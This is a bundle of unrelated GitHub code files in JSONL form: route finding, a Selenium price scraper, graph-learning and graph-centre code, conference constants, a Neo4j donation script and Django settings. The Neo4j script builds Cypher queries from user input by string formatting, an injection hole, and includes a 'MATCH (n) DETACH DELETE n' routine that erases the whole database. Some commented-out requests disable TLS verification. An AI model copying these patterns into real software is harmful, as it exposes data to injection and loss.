{"seq_id":"74927462826","text":"# encoding: utf-8\nfrom collections import defaultdict, deque\n\n\nclass Mapa(object):\n    def __init__(self):\n        self.pontos = set()\n        self.rotas = defaultdict(list)\n        self.distancias = {}\n\n    def add_ponto(self, valor):\n        \"\"\"Adds the point.\"\"\"\n        self.pontos.add(valor)\n\n    def add_rota(self, origem, destino, distancia):\n        \"\"\"Adds the route given its origin, destination and distance\"\"\"\n        self.rotas[origem].append(destino)\n        self.rotas[destino].append(origem)\n        self.distancias[(origem, destino)] = distancia\n\n\ndef dijkstra(mapa, inicio):\n    visited = {inicio: 0}\n    path = {}\n\n    pontos = set(mapa.pontos)\n\n    while pontos:\n        menor_ponto = None\n        for ponto in pontos:\n            if ponto in visited:\n                if menor_ponto is None:\n                    menor_ponto = ponto\n                elif visited[ponto] < visited[menor_ponto]:\n                    menor_ponto = ponto\n        if menor_ponto is None:\n            break\n\n        pontos.remove(menor_ponto)\n        distancia_atual = visited[menor_ponto]\n\n        for rota in mapa.rotas[menor_ponto]:\n            try:\n                distancia = distancia_atual + mapa.distancias[(menor_ponto,\n                                                               rota)]\n            except KeyError:\n                continue\n            if rota not in visited or distancia < visited[rota]:\n                visited[rota] = distancia\n                path[rota] = menor_ponto\n\n    return visited, path\n\n\ndef menor_caminho(mapa, origem, destino):\n    \"\"\"Function that returns the route with the shortest distance between 2 points.\"\"\"\n    visitados, caminhos = dijkstra(mapa, origem)\n    caminho_completo = deque()\n    _destination = caminhos[destino]\n\n    while _destination != origem:\n        caminho_completo.appendleft(_destination)\n        _destination = caminhos[_destination]\n\n    caminho_completo.appendleft(origem)\n    caminho_completo.append(destino)\n\n    return visitados[destino], list(caminho_completo)\n","repo_name":"fchevitarese/routecalc","sub_path":"dry/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"33372813380","text":"# To celebrate enrolling in Jjokko's remedial class\n# 1. fetch the exchange rate\n# 2. fetch the reverse premium\n# 3. read in the price range a - b\n# 4. read in the available balance\n# 5. read in the usage ratio\n# 6. build it as a GUI\n# receive input through the GUI\n# print output as an Excel-style table on screen / save to Excel
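\n\n# Added illustrative sketch (not from the original script): one assumed way to\n# combine the scraped figures once they are parsed to floats; the sign convention\n# for the premium is a guess based on the sample value below.\ndef premium_adjusted_krw(usd_price, exchange_rate, premium_pct):\n    return usd_price * exchange_rate * (1 + premium_pct / 100.0) #e.g. -2.09% lowers the KRW price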
Build a GUI\n# Take input via the GUI\n# Display the output on screen as an Excel-style table / save to Excel\nimport time\nimport warnings\nimport requests\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n\n#\n# # ignore warnings\n# warnings.filterwarnings(action='ignore')\n#\n# currency_url = 'https://www.investing.com/currencies/usd-krw'\n# res = requests.get(currency_url,verify=False,headers={\"User-Agent\": \"Mozilla/5.0\"})\n#\n# print(res)\n# soup = BeautifulSoup(res.text,'html.parser')\n#\n# # exchange rate info\n# usd_krw=soup.select_one('#last_last').get_text()\n#\n#\n# # fetch the reverse premium\n# premium_url = 'https://luka7.net/'\n# res = requests.get(premium_url,verify=False,headers={\"User-Agent\": \"Mozilla/5.0\"})\n# soup = BeautifulSoup(res.text,'html.parser')\n# time.sleep(1)\n# usd_krw=soup.select_one('#coinList > div.row.val.BTC > div.usdPrm.minus')\n#\n# print(res.text)\n# print(soup.select('#coinList > div.row.val.BTC'))\n#\n\n# common\nPAUSE_TIME = 2\n\n# load Selenium\noptions = webdriver.ChromeOptions()\n# options.add_argument('headless')\n# options.add_argument('window-size=1920x1080')\n# options.add_argument(\"disable-gpu\")\n\ndriver = webdriver.Chrome(executable_path='./chromedriver',options=options)\n\n# set the implicit wait time\ndriver.implicitly_wait(time_to_wait=10)\n\n# exchange rate info\nurl = 'https://www.google.com/search?newwindow=1&biw=1200&bih=683&sxsrf=ALeKk00h9FYH2hEYe_YmZj9if6lN7jTuLA%3A1613001970811&ei=8nQkYMbvMMm3mAXcjKrQBQ&q=USD+KRW&oq=USD+KRW&gs_lcp=Cgdnd3Mtd2l6EAMyCggAEMsBEEYQggIyBQgAEMsBMgUIABDLATIFCAAQywEyBQgAEMsBMgUIABDLATIFCAAQywEyBQgAEMsBMgUIABDLATIFCAAQywE6BwgAEEcQsAM6BAgjECc6BAgAEEM6AggAOgcIABAUEIcCOgIILjoJCCMQJxBGEIICUKxBWOtOYJtVaAFwAngAgAG6AYgBswiSAQMwLjeYAQCgAQGqAQdnd3Mtd2l6yAEIwAEB&sclient=gws-wiz&ved=0ahUKEwjGsPfLxODuAhXJG6YKHVyGCloQ4dUDCA0&uact=5'\ndriver.get(url=url)\nWebDriverWait(driver, 10).until(\n    expected_conditions.presence_of_all_elements_located( (By.CSS_SELECTOR,'#knowledge-currency__updatable-data-column > div.b1hJbf > div.dDoNo.ikb4Bb.vk_bk.gsrt.gzfeS > span.DFlfde.SwHCTb') )\n)\ntime.sleep(2) # required\n\nexchangeRate = driver.execute_script(\"return document.querySelector('#knowledge-currency__updatable-data-column > div.b1hJbf > div.dDoNo.ikb4Bb.vk_bk.gsrt.gzfeS > span.DFlfde.SwHCTb').textContent\")\nprint('Exchange rate: ',exchangeRate)\n\n# reverse premium info\nurl = 'https://www.luka7.net'\ndriver.get(url=url)\n\n# AJAX sync wait time\n# code that works for now\n# WebDriverWait(driver, 10).until(\n#     expected_conditions.presence_of_all_elements_located( (By.CSS_SELECTOR,'#coinList > div.row.val.BTC') )\n# )\n# time.sleep(2) # required\n\n# WebDriverWait did not behave as desired, so handle it directly\nwhile True:\n    WebDriverWait(driver, 10).until(\n        expected_conditions.presence_of_all_elements_located( (By.CSS_SELECTOR,'#coinList > div.row.val.BTC') )\n    )\n    check = driver.execute_script(\"return document.querySelector('#coinList > div.row.val.BTC > div.usdPrm').textContent\")\n\n    if check != '':\n        break\n    else:\n        time.sleep(1)\n\npremium = driver.execute_script(\"return document.querySelector('#coinList > div.row.val.BTC > div.usdPrm').textContent\")\npos_s, pos_e = premium.find('('), premium.find('%')\npremium_rate = premium[pos_s+1:pos_e] # target sample : -1,034,710.00 (-2.09%)\nprint('Premium: ',premium)\nprint('Premium rate: ',premium_rate)\n\n\n# 3. 
Get the price range a - b as input\nprice_a = input()\nprice_b = input()\n\nprint('price range :',price_a,' ~ ',price_b)\n\n\n\n\n\ndriver.close()","repo_name":"lavientor/upbitPriceCalculation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73457057707","text":"import pickle\nfrom torch_geometric.data import HeteroData\nfrom torch_geometric.loader import NeighborLoader\nimport torch_geometric.transforms as T\nimport torch\nimport numpy as np\n\ndef load_binary(path):\n    with open(f'{path}', 'rb') as rb:\n        data = pickle.load(rb)\n    return data\n\ndef createMetaPathBasedAdj(m1, m2):\n    adj = np.matmul(m1, m2)\n    adj[adj > 1] = 1\n    return adj\n\nname_list = ['kato']\n\n# author matrix\nA = load_binary('../data/kato/author/author_1.Matrix').toarray()\n# venue matrix\nV = load_binary('../data/kato/conference/conference_1.Matrix').toarray()\n# keyword matrix\nK = load_binary('../data/kato/term/term_1.Matrix').toarray()\n# year matrix\nY = load_binary('../data/kato/year/year_1.Matrix').toarray()\n\nPAP = createMetaPathBasedAdj(A, A.T)\nAPA = createMetaPathBasedAdj(A.T, A)\n\ndata = HeteroData()\ndata['author'] = torch.tensor(A)\ndata['venue'] = torch.tensor(V)\ndata['keyword'] = torch.tensor(K)\ndata['year'] = torch.tensor(Y)\n\nprint(data)\n","repo_name":"Last-Vega/heteroGATE","sub_path":"src/input_data.py","file_name":"input_data.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2793173077","text":"import datetime\nimport time\n\"\"\"\nRSS Conference constants\n\"\"\"\n\nADMIN = \"rss2017admin\"\nCONFERENCE = \"roboticsfoundation.org/RSS/2017/RCW_Workshop\"\nCOCHAIRS = CONFERENCE+\"/Program_Co-Chairs\"\n# the two tracks within the conference\nPOSTER = CONFERENCE+\"/-_Poster\"\nPROCEEDINGS = CONFERENCE+\"/-_Proceedings\"\nPOSTER_REVIEWERS = POSTER+\"/Reviewers\"\nPROCEEDINGS_REVIEWERS = PROCEEDINGS+\"/Reviewers\"\n# Due date June 18, 2017 at 7:59am here\nDATE_DUE = datetime.datetime(2017, 6, 18, 7, 59)\nTIMESTAMP_DUE = int(time.mktime(DATE_DUE.timetuple()))*1000\n# June 27, 2017, 11:59:59pm Anywhere on Earth time (UTC -12).\n# == June 28, 2017, 7:59am EST\nREVIEW_DUE = datetime.datetime(2017, 6, 28, 7, 59)\nREVIEW_DUE = int(time.mktime(REVIEW_DUE.timetuple()))*1000\n\n","repo_name":"openreview/openreview-scripts","sub_path":"venues/roboticsfoundation.org/RSS/2017/RCW_Workshop/python/rssdata.py","file_name":"rssdata.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"23593590008","text":"#!/usr/bin/env python3\n\n# -------------------------------------------------#\n# Title: neo4j_donor.py\n# Dev: Scott Luse\n# Date: 06/02/2018\n# Comments: need to add delete record; more investigation\n# required to use the cyph MATCH for a specific persons\n# donation records\n# -------------------------------------------------#\n\nimport login_database\nimport utilities\n\nlog = utilities.configure_logger('default', '../logs/neo4j_donor.log')\n\n\ndef donor_create_update(gift_amount, donor_name):\n    \"\"\"\n    neo4j add donor record\n    \"\"\"\n    log.info(\"Login to database\")\n    driver = login_database.login_neo4j_cloud()\n    with driver.session() as session:\n        log.info('Add Donation record')\n        cyph = \"CREATE (n:Donation {name:'%s', gift: '%s'})\" % (\n            donor_name, gift_amount)\n        session.run(cyph)\n\n        
log.info(\"Show all donations for: \" + donor_name)\n cyph = \"\"\"MATCH (p:Donation)\n RETURN p.name as name, p.gift as gift\n \"\"\"\n result = session.run(cyph)\n print(\"Donations in database for: \" + donor_name)\n for record in result:\n print(record['name'], record['gift'])\n\ndef donor_screen_report():\n \"\"\"\n neo4j screen reporting\n \"\"\"\n log.info(\"Login to database\")\n driver = login_database.login_neo4j_cloud()\n with driver.session() as session:\n log.info(\"Show all donations\")\n cyph = \"\"\"MATCH (p:Donation)\n RETURN p.name as name, p.gift as gift\n \"\"\"\n result = session.run(cyph)\n print(\"All donation database records:\")\n for record in result:\n print(record['name'], record['gift'])\n\ndef donor_detach_delete():\n \"\"\"\n neo4j detach_delete\n \"\"\"\n log.info(\"Running clear_all\")\n driver = login_database.login_neo4j_cloud()\n with driver.session() as session:\n session.run(\"MATCH (n) DETACH DELETE n\")\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/ScottL/lesson08/src/neo4j_donor.py","file_name":"neo4j_donor.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42575793057","text":"import numpy as np\nimport networkx as nx\nfrom numpy import linalg as LA\nfrom numpy.linalg import matrix_power\nimport copy\nimport matplotlib.pyplot as plt\nfrom utils_.dijkstra import find_all_paths\n\ndef brute_path_optimization(A : np.array):\n \"\"\"_summary_\n Brute force path optimization\n Args:\n A (np.array): Adjacency matrix\n\n Returns:\n current_path_avg, current_center\n current_path_avg(float): paths mean value\n current_center : vertex which minimizes the path sum\n \"\"\"\n vertices_num = np.shape(A)[0]\n current_path_avg = np.inf\n current_center = 0\n\n for i in range(vertices_num):\n lengths, paths = find_all_paths(wmat = A, start=i)\n\n if np.mean(lengths) < current_path_avg:\n current_path_avg = np.mean(lengths)\n current_center = i\n\n return current_path_avg, current_center\n\ndef optimize_paths(A : np.array, start_vertex = 0):\n \"\"\"_summary_\n\n Args:\n A (np.array): adjacency matrix\n start_vertex (int, optional): Initial center location. 
Defaults to 0.\n\n Returns:\n optimal centroid vertex, value of mean paths\n \"\"\"\n \n current_start = start_vertex\n\n while True:\n lengths, paths = find_all_paths(wmat = A, start=current_start)\n\n total_start_length = np.sum(lengths)\n\n adjacent_vertices = np.where(~np.isclose([0], A[current_start]))[0]\n\n adj_lengths_minimum = np.inf\n adj_vertex_minimum = start_vertex\n\n for vertex in adjacent_vertices:\n\n new_lengths = copy.deepcopy(lengths)\n for i in range(len(paths)):\n if vertex in paths[i]:\n new_lengths[i] -= A[current_start][vertex]\n else:\n new_lengths[i] += A[current_start][vertex]\n\n if np.sum(new_lengths) < adj_lengths_minimum:\n adj_lengths_minimum = np.sum(new_lengths)\n adj_vertex_minimum = vertex\n \n if adj_lengths_minimum < total_start_length:\n current_start = adj_vertex_minimum\n else:\n break\n\n return current_start, np.mean(find_all_paths(wmat = A, start=current_start)[0])\n\ndef find_closest_vertex(G : np.array):\n\n centroid = np.mean(G, axis = 0)\n distances = np.sum((G - centroid)**2, axis=1)\n\n return np.argmin(distances)\n\n\ndef _construct_inner_product_matrix_(Delta : np.array):\n \"\"\"_summary_\n\n Args:\n Delta (np.array): dissimiliarity matrix\n\n Returns:\n np.array: Inner product matrix (n \\cross n)\n\n \"\"\"\n n = np.shape(Delta)[0]\n B = np.zeros((n ,n))\n third_term = np.sum(np.square(Delta)) / n**2\n\n for i in range(n):\n second_term = np.sum(np.square(Delta[i, :])) / n\n\n for j in range(n):\n first_term = np.sum(np.square(Delta[:, j])) / n\n\n B[i][j] = Delta[i][j] - first_term - second_term + third_term\n \n B *= -0.5\n\n return B\n\ndef calculate_embedding_matrix(B : np.array, m = 2):\n \"\"\"_summary_\n\n Args:\n B (np.array): inner product matrix\n n (int, optional): Dimension of the embedding space. Defaults to 2.\n\n Returns:\n np.array: Points coordinates matrix (n \\cross m)\n\n \"\"\"\n w, v = LA.eigh(B)\n top_m_eigenval, V = w[-m:], v[:, -m:]\n Lambda = np.diag(top_m_eigenval)\n\n return V @ np.sqrt(Lambda)\n\ndef approximate_2_edge_paths_lengths(A : np.array):\n\n \"\"\"_summary_\n\n Args:\n A (np.array): (n \\cross n) Adjacency matrix\n n (int, optional): paths distance to approximate. Defaults to 2.\n\n \"\"\"\n adj = copy.deepcopy(A)\n non_weighted_A = np.zeros(np.shape(adj))\n non_weighted_A[np.nonzero(adj)] = 1\n\n lengts_approx = adj @ non_weighted_A + non_weighted_A @ adj\n lengts_approx[np.diag_indices_from(adj)] = 0\n\n\n paths_num = matrix_power(non_weighted_A, 2)\n paths_num[np.diag_indices_from(adj)] = 0\n \n for i, j in zip(*np.nonzero(lengts_approx)):\n lengts_approx[i][j] = lengts_approx[i][j] / paths_num[i][j]\n\n for i, j in zip(*np.where(adj == 0)):\n adj[i][j] = lengts_approx[i][j]\n\n return adj\n\ndef approximate_paths_lengths(A : np.array, m : int = 2):\n \"\"\"_summary_\n\n Args:\n A (np.array): _description_\n m (int, optional): Number of 2-edge-length paths approximation, each multiplication approximates paths depth by power of 2. Defaults to 2. 
\n \"\"\"\n\n approx_matrix = A\n for i in range(m):\n approx_matrix = approximate_2_edge_paths_lengths(approx_matrix)\n \n return approx_matrix\n\ndef calculate_centroid_vertex(A: np.array, m = 2):\n\n A /= np.max(A)\n approx = approximate_paths_lengths(A)\n\n for i, j in zip(*np.where(approx == 0)):\n if i != j:\n approx[i][j] = np.max([np.max(approx[i, :]), np.max(approx[:, j])])\n\n B = _construct_inner_product_matrix_(approx)\n\n X = calculate_embedding_matrix(B, m=2)\n\n ver = find_closest_vertex(X)\n\n return ver\n","repo_name":"PhantomOfTheOpera/GravitationalNetworkOptim","sub_path":"mds.py","file_name":"mds.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18381841441","text":"#First step: open the file that you want to read by using open function\nmyfile = open('mytext.txt', 'r')\n\n#print (myfile.read())\n\n#read all the text in the files by using readlines() function\n#print (myfile.readlines())\n\n#use for loop and also read the test in the file\nfor lines in myfile:\n print(myfile.readlines())\n\n\nmyfile.close()","repo_name":"MahmoudAhmadOsman/Python","sub_path":"Python Software Developer/readtextfile.py","file_name":"readtextfile.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30167538601","text":"\"\"\"Common settings and globals.\"\"\"\nimport os\nfrom os.path import abspath, basename, dirname, join, normpath\nfrom sys import path\nfrom datetime import datetime\nimport environ\n\nroot = environ.Path(__file__) - 4 # (/open_bilanci/bilanci_project/bilanci/settings/ - 4 = /)\n\n# set default values and casting\nenv = environ.Env(\n DEBUG=(bool, True),\n)\nenv.read_env(root('.env'))\n\n########## INSTANCE TYPE: production | staging | development | test\nINSTANCE_TYPE = env.str('INSTANCE_TYPE')\n\n########## PATH CONFIGURATION\nREPO_ROOT = root()\nPROJECT_ROOT = root('bilanci_project')\n\n# Add our project to our pythonpath, this way we don't need to type our project\n# name in our dotted import paths:\npath.append(PROJECT_ROOT)\n\n# Site name:\nSITE_ROOT = root('bilanci_project/bilanci')\nSITE_NAME = basename(SITE_ROOT)\nSITE_VERSION = 'beta'\n########## END PATH CONFIGURATION\n\n\n########## DEBUG CONFIGURATION\nDEBUG = env.bool('DEBUG', False)\nTEMPLATE_DEBUG = env.bool('TEMPLATE_DEBUG', False)\n########## END DEBUG CONFIGURATION\n\n\n########## MANAGER CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins\nADMINS = (\n ('Your Name', 'your_email@example.com'),\n)\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers\nMANAGERS = ADMINS\n\n########## END MANAGER CONFIGURATION\n\n\n########## PROJECT_OWNERS CONFIGURATION\n# PROJECT_OWNERS WILL GET AN EMAIL WHEN IMPORT MNG TASK ARE COMPLETED\n\nPROJECT_OWNERS = (\n # ('Guglielmo Celata', 'guglielmo.celata@depp.it'),\n ('Stefano Vergani', 'stefano.vergani.it@gmail.com'),\n)\n\n\n########## DATABASE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\nDATABASES = {\n 'default': env.db('DB_DEFAULT_URL'),\n}\n########## END DATABASE CONFIGURATION\n\n\n########## GENERAL CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone\nTIME_ZONE = 'Europe/Rome'\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code\nLANGUAGE_CODE = 'it-IT'\n\n# See: 
https://docs.djangoproject.com/en/dev/ref/settings/#site-id\nSITE_ID = 1\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n\nUSE_I18N = True\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n\nUSE_L10N = True\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz\nUSE_TZ = True\n########## END GENERAL CONFIGURATION\n\n\n########## MEDIA CONFIGURATION\nMEDIA_ROOT = root('assets')\nMEDIA_URL = '/media/'\n########## END MEDIA CONFIGURATION\n\n\n########## STATIC FILE CONFIGURATION\nSTATIC_ROOT = root('static')\nSTATIC_URL = '/static/'\n\n# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS\nSTATICFILES_DIRS = (\n normpath(join(PROJECT_ROOT, 'static')),\n)\n\n# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n########## END STATIC FILE CONFIGURATION\n\nOPENDATA_ROOT = root('open_data')\nOPENDATA_ZIP_ROOT = os.path.join(root(OPENDATA_ROOT), 'zip')\nOPENDATA_CSV_ROOT = os.path.join(root(OPENDATA_ROOT), 'csv')\nOPENDATA_XML_ROOT = os.path.join(root(OPENDATA_ROOT), 'xml')\nOPENDATA_URL = '/opendata/'\n\n\n########## SECRET CONFIGURATION\nSECRET_KEY = env('SECRET_KEY') # Raises ImproperlyConfigured exception if SECRET_KEY not in os.environ\n########## END SECRET CONFIGURATION\n\n\n########## SITE CONFIGURATION\n# Hosts/domain names that are valid for this site\n# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts\nALLOWED_HOSTS = []\n########## END SITE CONFIGURATION\n\n\n########## FIXTURE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS\nFIXTURE_DIRS = (\n normpath(join(PROJECT_ROOT, 'fixtures')),\n)\n########## END FIXTURE CONFIGURATION\n\n\n########## TEMPLATE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n 'django.core.context_processors.request',\n\n # bilanci project context processor\n 'bilanci.context_processor.main_settings',\n)\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n)\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs\nTEMPLATE_DIRS = (\n normpath(join(PROJECT_ROOT, 'templates')),\n)\n########## END TEMPLATE CONFIGURATION\n\n\n########## MIDDLEWARE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#middleware-classes\nMIDDLEWARE_CLASSES = (\n # Default Django middleware.\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'bilanci.middlewares.PrivateBetaMiddleware',\n 'bilanci.middlewares.ComuniServicesMiddleware',\n)\n########## END MIDDLEWARE 
CONFIGURATION\n\n\n########## URL CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#root-urlconf\nROOT_URLCONF = '%s.urls' % SITE_NAME\n########## END URL CONFIGURATION\n\n\n########## APP CONFIGURATION\nDJANGO_APPS = (\n # Default Django apps:\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sitemaps',\n\n # Useful template tags:\n 'django.contrib.humanize',\n\n # Admin panel and documentation:\n 'django.contrib.admin',\n 'django.contrib.admindocs',\n\n # Django add-ons\n 'django_extensions',\n\n 'django.contrib.gis',\n)\n\nTHIRD_PARTY_APPS = (\n # Database migration helpers:\n 'south',\n 'django_select2',\n 'treeadmin',\n 'mptt',\n 'front',\n 'tinymce',\n 'robots',\n)\n\n# Apps specific for this project go here.\nLOCAL_APPS = (\n 'bilanci',\n 'territori',\n 'services',\n 'idioticon',\n 'shorturls',\n)\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps\nINSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n########## END APP CONFIGURATION\n\nPOSTGIS_VERSION = (2, 0, 0)\n\n\n########## LOGGING CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'standard': {\n 'format': \"[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s\",\n },\n 'reduced': {\n 'format': \"%(levelname)s %(message)s\"\n }\n },\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'standard'\n },\n 'test_console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'reduced'\n },\n 'import_logfile': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': REPO_ROOT + \"/log/import_logfile\",\n 'mode': 'w',\n 'formatter': 'standard',\n },\n 'import_logfile_append': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': REPO_ROOT + \"/log/import_logfile\",\n 'formatter': 'standard',\n },\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n 'bilanci_project': {\n 'handlers': ['console'],\n 'level': 'INFO',\n 'propagate': False,\n },\n\n 'management': {\n 'handlers': ['console', 'import_logfile'],\n 'level': 'DEBUG',\n 'propagate': False,\n },\n 'management_append': {\n 'handlers': ['console', 'import_logfile_append'],\n 'level': 'DEBUG',\n 'propagate': False,\n },\n 'test': {\n 'handlers': ['test_console'],\n 'level': 'DEBUG',\n 'propagate': False,\n },\n }\n}\n########## END LOGGING CONFIGURATION\n\n\n########## WSGI CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application\nWSGI_APPLICATION = 'wsgi.application'\n########## END WSGI CONFIGURATION\n\nOUTPUT_PATH = '../scraper_project/scraper/output/'\nLISTA_COMUNI = 'listacomuni.csv'\nLISTA_COMUNI_PATH = OUTPUT_PATH + 
LISTA_COMUNI\n\nS3_LISTA_COMUNI_URL = env('S3_LISTA_COMUNI_URL')\n\n# preventivi url\nURL_PREVENTIVI_QUADRI = \"http://finanzalocale.interno.it/apps/floc.php/certificati/index/codice_ente/%s/cod/3/anno/%s/md/0/cod_modello/PCOU/tipo_modello/U/cod_quadro/%s\"\n# consuntivi url\nURL_CONSUNTIVI_QUADRI = \"http://finanzalocale.interno.it/apps/floc.php/certificati/index/codice_ente/%s/cod/4/anno/%s/md/0/cod_modello/CCOU/tipo_modello/U/cod_quadro/%s\"\n\n# Google Account Oauth key\nOAUTH2_KEY_PATH=env('OAUTH2_KEY_PATH')\n\n# Google Docs keys\nGDOC_KEYS = {\n 'titoli_map': env('GDOC_TITOLI_MAP_KEY'),\n 'voci_map': env('GDOC_VOCI_MAP_KEY'),\n 'simple_map': env('GDOC_VOCI_SIMPLE_MAP_KEY'),\n 'simple_tree': env('GDOC_VOCI_SIMPLE_TREE_KEY'),\n 'bilancio_consuntivo_2013': env('GDOC_BILANCIO_CONSUNTIVO_2013'),\n 'bilancio_preventivo_2014': env('GDOC_BILANCIO_PREVENTIVO_2014'),\n 'bilancio_consuntivo_2014': env('GDOC_BILANCIO_CONSUNTIVO_2014'),\n 'bilancio_preventivo_2015': env('GDOC_BILANCIO_PREVENTIVO_2015')\n}\n\nCOUCHDB_RAW_NAME = 'bilanci'\nCOUCHDB_NORMALIZED_TITOLI_NAME = 'bilanci_titoli'\nCOUCHDB_NORMALIZED_VOCI_NAME = 'bilanci_voci'\nCOUCHDB_SIMPLIFIED_NAME = 'bilanci_simple'\n\nCOUCHDB_SERVERS = {\n 'localhost': {\n 'host': '127.0.0.1',\n 'port': '5984',\n 'user': env('COUCHDB_LOCALHOST_USER'),\n 'password': env('COUCHDB_LOCALHOST_PASSWORD'),\n },\n 'staging': {\n 'host': env('COUCHDB_STAGING_HOST'),\n 'port': env('COUCHDB_STAGING_PORT'),\n 'user': env('COUCHDB_STAGING_USER'),\n 'password': env('COUCHDB_STAGING_PASSWORD'),\n },\n}\nCOUCHDB_DEFAULT_SERVER = 'staging'\n\nCACHES = {\n \"default\": {\n \"BACKEND\": \"redis_cache.cache.RedisCache\",\n \"LOCATION\": \"127.0.0.1:6379:1\", # db 1\n \"TIMEOUT\": 0,\n \"OPTIONS\": {\n \"CLIENT_CLASS\": \"redis_cache.client.DefaultClient\",\n }\n }\n}\n\nCACHE_PAGE_DURATION_SECS = 3600\n\nSOUTH_TESTS_MIGRATE = False\n\n##\n# Application variables\n##\n\nGDP_DEFLATORS = {\n 2000: 0.777728432,\n 2001: 0.800109527,\n 2002: 0.825777358,\n 2003: 0.851531437,\n 2004: 0.871901728,\n 2005: 0.887745029,\n 2006: 0.902904158,\n 2007: 0.924337811,\n 2008: 0.947752751,\n 2009: 0.967550814,\n 2010: 0.971307248,\n 2011: 0.984445032,\n 2012: 1,\n 2013: 1.014412693,\n # TODO: update with real deflator value\n 2014: 1.014412693,\n 2015: 1.014412693,\n}\n\nCAPOLUOGHI_PROVINCIA = [u'agrigento-comune-ag', u'alessandria-comune-al', u'ancona-comune-an', u'andria-comune-bt',\n u'aosta-comune-ao', u'arezzo-comune-ar', u'ascoli-piceno-comune-ap',\n u'asti-comune-at', u'avellino-comune-av', u'bari-comune-ba', u'barletta-comune-bt',\n u'belluno-comune-bl', u'benevento-comune-bn', u'bergamo-comune-bg', u'biella-comune-bi',\n u'bologna-comune-bo',\n u'bolzano-bozen-comune-bz', u'brescia-comune-bs', u'brindisi-comune-br', u'cagliari-comune-ca',\n u'caltanissetta-comune-cl', u'campobasso-comune-cb', u'carbonia-comune-ci',\n u'caserta-comune-ce',\n 